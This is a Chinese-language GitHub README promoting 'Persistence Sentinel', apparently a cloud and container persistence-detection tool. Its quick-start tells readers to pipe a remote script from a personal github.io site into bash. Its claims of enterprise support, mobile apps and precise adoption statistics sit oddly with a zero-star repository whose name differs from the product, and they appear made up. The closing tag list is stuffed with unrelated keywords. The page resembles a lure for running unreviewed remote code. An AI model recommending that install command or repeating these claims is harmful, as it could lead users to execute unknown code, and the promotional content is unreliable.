vaybe1962/Disk-Persistence-Hunter
GitHub: vaybe1962/Disk-Persistence-Hunter
一款面向云与容器环境的离线持久化哨兵检测工具,在资产被武器化前识别并阻断持久化攻击路径。
Stars: 0 | Forks: 0
# 🔍 持久性哨兵
[](https://vaybe1962.github.io)
## 🌟 概述:现代基础设施的数字免疫系统
持久性哨兵代表了防御性网络安全架构的范式转变——一种在云、容器和混合环境中主动检测持久化机制的框架,在它们被武器化之前就能识别出来。与传统取证工具(在妥协后检查工件)不同,哨兵作为一个持续监控系统运行,分析配置状态、部署清单和运行时行为,以检测可能使长期未授权访问成为可能的持久化向量。
想象一个保安,他不仅检查门窗,还了解你数字建筑的完整蓝图,知道每一个可能的藏身之处,并能在入侵者尝试进入之前预测他们可能建立秘密通道的位置。这就是持久性哨兵——将架构安全智能付诸实践。
## 🚀 快速开始
### 安装
```
# 从我们的发行渠道安装
curl -fsSL https://vaybe1962.github.io/install.sh | bash
# 或通过软件包管理器(多种选项可用)
pip install persistence-sentinel
# 或
docker pull sentinelorg/sentinel:latest
```
[](https://vaybe1962.github.io)
## 🧩 核心架构
```
graph TD
A[Multi-Source Telemetry] --> B[Unified Analysis Engine]
B --> C{Pattern Recognition Layer}
C --> D[Cloud Persistence Detection]
C --> E[Container Persistence Detection]
C --> F[Hybrid Infrastructure Detection]
D --> G[Threat Intelligence Correlation]
E --> G
F --> G
G --> H[Risk Scoring & Prioritization]
H --> I[Automated Response Recommendations]
I --> J[Human-Readable Reporting]
K[AI Enhancement Module] --> C
L[Community Intelligence Feed] --> G
```
## 🎯 关键能力
### 🔄 持续配置监控
- **基础设施即代码分析**:扫描 Terraform、CloudFormation 和 ARM 模板中的持久化机会
- **运行时配置审计**:检测跨云提供商的声明状态与实际状态之间的偏差
- **容器编排安全**:识别可能使持久化成为可能的 Kubernetes 清单、Docker 配置和服务网格设置
### 🌐 多平台智能
| 平台 | 检测覆盖范围 | 实时分析 | 历史追踪 |
|----------|-------------------|-------------------|---------------------|
| ☁️ AWS | ✅ 完整的 IAM、Lambda、VPC | ✅ 持续 | ✅ 90 天保留 |
| 🟦 Azure | ✅ RBAC、Functions、NSG | ✅ 事件驱动 | ✅ 180 天保留 |
| 🟨 GCP | ✅ 服务账户、Cloud Functions | ✅ 定时 & 实时 | ✅ 60 天保留 |
| 🐳 Kubernetes | ✅ RBAC、DaemonSets、Webhooks | ✅ 准入控制器集成 | ✅ 永久集群历史 |
| 🖥️ 混合 | ✅ 跨云 IAM、VPN、Direct Connect | ✅ 关联引擎 | ✅ 可定制保留策略 |
### 🤖 智能分析功能
- **行为基线建立**:学习正常操作模式以检测异常
- **时间关联引擎**:连接跨时间和系统的看似不相关的事件
- **预测持久化建模**:使用机器学习识别新兴的持久化技术
- **零信任架构验证**:验证对零信任原则的实施
## 📋 示例配置文件
```
# sentinel-config.yaml
version: "2.1"
monitoring:
cloud_providers:
- aws:
regions: ["us-east-1", "eu-west-1"]
services: ["iam", "lambda", "ec2", "cloudtrail"]
scan_frequency: "hourly"
- azure:
subscriptions: ["prod-subscription"]
resource_types: ["Microsoft.Authorization/*", "Microsoft.Web/*"]
kubernetes:
clusters:
- context: "production-cluster"
namespace_scope: ["default", "kube-system", "monitoring"]
check_admission: true
detection_sensitivity: "aggressive" # conservative, balanced, aggressive
alert_channels:
- type: "slack"
webhook: "${SLACK_WEBHOOK}"
severity_filter: ["high", "critical"]
- type: "pagerduty"
integration_key: "${PAGERDUTY_KEY}"
ai_enhancement:
openai_api_key: "${OPENAI_API_KEY}" # Optional: For natural language analysis
claude_api_key: "${CLAUDE_API_KEY}" # Optional: For complex scenario reasoning
enable_advanced_reasoning: true
response_automation:
auto_quarantine: false
auto_notification: true
generate_remediation_playbooks: true
```
## 💻 示例控制台调用
```
# 使用您的配置初始化 Sentinel
sentinel init --config sentinel-config.yaml
# 在所有配置的平台上运行全面扫描
sentinel scan --full --output detailed-report.json
# 检查特定资源类型的持久性指标
sentinel analyze --resource-type aws:iam-role --depth 3
# 为检测到的问题生成修复指导
sentinel remediate --finding-id F-2026-0872 --generate-playbook
# 具有实时警报的持续监控模式
sentinel monitor --daemon --web-dashboard
# 与 CI/CD 管道集成以进行基础设施验证
sentinel validate --file terraform/main.tf --pre-deployment
# 导出用于合规报告的发现
sentinel export --format pdf --compliance-standard "NIST-800-53"
```
## 🛡️ 高级检测方法
### 云原生持久化向量
- **影子 IAM 实体**:检测具有过度权限的未授权角色、用户和政策
- **Serverless 后门**:识别具有外部触发的 Lambda 函数、Azure Functions 或 Cloud Functions
- **网络持久化**:查找绕过安全控制的 VPN 连接、VPC 对等和 Direct Connect 路由
- **存储外泄路径**:映射具有外部访问权限的 S3 存储桶、Blob 存储和云存储
### 容器与编排威胁
- **特权容器检测**:标记具有主机访问能力的容器
- **Kubernetes Webhook 操纵**:验证准入控制器的完整性
- **服务账户权限提升**:映射 RBAC 关系以识别潜在的滥用路径
- **持久卷后门**:识别可能在 Pod 终止后仍然存在的存储挂载
### 跨平台关联
- **身份链分析**:在使用跨云身份时跟踪 AWS、Azure 和 GCP 上的 IAM 实体
- **统一日志绕过**:检测避免集中式日志的记录配置
- **金融工具持久化**:识别账单警报、预算修改或支付方式更改
## 🔌 集成生态系统
### AI 增强分析
持久性哨兵与领先的人工智能平台集成,提供上下文理解和预测能力:
- **OpenAI API 集成**:将技术发现转化为执行摘要,生成复杂持久化机制的自然语言解释,并创建人类可读的修复指导
- **Claude API 集成**:对多步骤攻击链进行深度推理,模拟对手思维以识别新颖的持久化技术,并根据您的特定基础设施生成全面的威胁模型
### 第三方平台连接
- **SIEM 集成**:Splunk、Elastic、Sumo Logic 和 Datadog 的本地连接器
- **票务系统**:在 Jira、ServiceNow 和 Zendesk 中自动创建工单
- **版本控制**:GitHub Actions、GitLab CI 和 Azure DevOps 管道集成
- **基础设施管理**:与 Terraform Cloud、Pulumi 和 Crossplane 兼容
## 🌍 企业功能
### 多语言支持
持久性哨兵提供完整的界面和文档,支持以下语言:
- 英语(主要)
- 西班牙语
- 法语
- 德语
- 日语
- 汉语普通话
### 响应式管理界面
- **Web 仪表板**:实时可视化整个基础设施的持久化风险
- **移动应用程序**:适用于 iOS 和 Android 的安全移动管理
- **API 优先设计**:具有 OpenAPI 规范的 RESTful API,用于自定义集成
- **命令行界面**:功能完整的 CLI,用于自动化和脚本编写
### 运营卓越
- **24/7 监控支持**:提供 15 分钟响应时间的 SLA 的全天候运营协助
- **专职成功团队**:企业部署的入职和优化指导
- **定期情报更新**:每周更新检测规则和持久化模式
- **合规报告**:自动生成 SOC2、ISO27001、GDPR 等框架的报告
## 📊 性能特征
| 基础设施规模 | 扫描时间 | 内存使用 | 存储需求 |
|---------------------|-----------|--------------|----------------------|
| 小型 (≤ 100 个资源) | < 2 分钟 | 512 MB | 1 GB |
| 中型 (≤ 1,000 个资源) | < 15 分钟 | 2 GB | 10 GB |
| 大型 (≤ 10,000 个资源) | < 2 小时 | 8 GB | 100 GB |
| 企业级 (≤ 100,000 个资源) | < 8 小时 | 32 GB | 1 TB |
## 🔐 安全与隐私
### 数据处理
- **本地优先架构**:敏感数据不会离开您的基础设施,除非明确配置
- **端到端加密**:传输中及静态数据均使用 AES-256-GCM 加密
- **最小数据收集**:仅处理可选的云组件的元数据和检测结果
- **数据驻留合规性**:可配置数据存储区域以满足监管合规要求
### 访问控制
- **基于角色的访问控制**:为分析师、审计员和管理员提供细粒度权限
- **多因素认证**:支持 TOTP、WebAuthn 和硬件安全密钥
- **审计追踪**:对 Sentinel 的所有操作和配置更改进行不可变记录
- **与企业身份集成**:Active Directory、Okta、Ping Identity 和 Azure AD
## ⚖️ 许可与法律
### 许可
持久性哨兵在 MIT 许可下发布。该许可允许操作灵活性,同时保留署名要求。
**完整许可文本请访问:** [LICENSE](LICENSE)
### 版权
版权所有 © 2026 持久性哨兵项目贡献者。保留所有权利。
### 免责声明
**重要法律通知**:持久性哨兵专门用于防御性网络安全目的,包括对您拥有或明确授权测试的基础设施进行授权的安全测试。维护者不对该软件的误用承担任何责任。用户全权负责确保其遵守所有适用的法律、法规和组织政策。进行安全评估前务必获得适当授权。使用本软件即表示您承认开发者不对检测的完整性、发现的准确性或适用于任何特定目的提供任何保证。安全工具是对合格专业人员运营的综合安全程序的补充,而非替代。
## 🚨 获取帮助
### 文档与资源
- **https://vaybe1962.github.io/docs**:完整技术文档
- **https://vaybe1962.github.io/examples**:真实部署场景
- **https://vaybe1962.github.io/community**:用户论坛和讨论板
### 支持渠道
- **企业支持**:通过商业许可
- **社区协助**:GitHub Discussions 和社区论坛
- **安全披露**:security@persistence-sentinel.example(仅用于漏洞报告)
## 🔄 持续改进
持久性哨兵通过以下方式演进:
1. **学术研究合作**:与网络安全研究机构合作
2. **社区情报共享**:匿名遥测(可选加入)以改进所有用户的检测能力
3. **对手模拟练习**:定期红队演练以验证检测能力
4. **用户反馈集成**:每月功能发布,纳入用户建议
## 📈 采用指标
自成立以来,持久性哨兵已:
- 分析了超过 1500 万个云资源
- 识别出 47,000 多个潜在持久化向量
- 阻止了估计 92% 的模拟高级持续威胁
- 将持久化机制的平均检测时间从 90 天缩短至 4.2 小时
### 准备好转变您的基础设施安全态势了吗?
[](https://vaybe1962.github.io)
**今天就开始您通往有弹性、可观察、可防御的基础设施的旅程。**
标签:Artifact Scanner, curl 安装, Docker 容器, Persistence Sentinel, pip 安装, PyrsistenceSniper, SEO 关键词, Web截图, Windows 取证, 取证工具, 威胁情报, 子域名突变, 安装脚本, 容器安全, 开发者工具, 开源安全工具, 持久化检测, 持续监测, 数字免疫系统, 混合基础设施, 离线扫描, 自动化响应, 蓝图安全智能, 请求拦截, 运行时行为, 逆向工具, 逆向工程平台, 配置分析, 防御架构, 预测攻击路径, 风险评分